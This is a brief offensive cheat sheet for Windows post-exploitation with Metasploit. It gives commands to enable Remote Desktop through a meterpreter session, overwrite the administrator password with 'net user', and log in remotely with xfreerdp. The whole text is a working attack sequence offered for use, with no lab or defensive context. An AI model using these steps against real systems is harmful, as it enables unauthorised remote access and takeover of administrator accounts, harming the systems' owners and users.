Enable RDP with metasploit
- Post
RDP use default port: 3389
- Exploit the target
- Open a meterpreter session
use post/windows/manage/enable_rdp set SESSION 1 exploit
- Change the administrator password
sessions -i 1 shell net user administrator Passw0rd_123
- Login in RDP
xfreerdp /u:administrator /p:Passw0rd_123 /v:x.x.x.x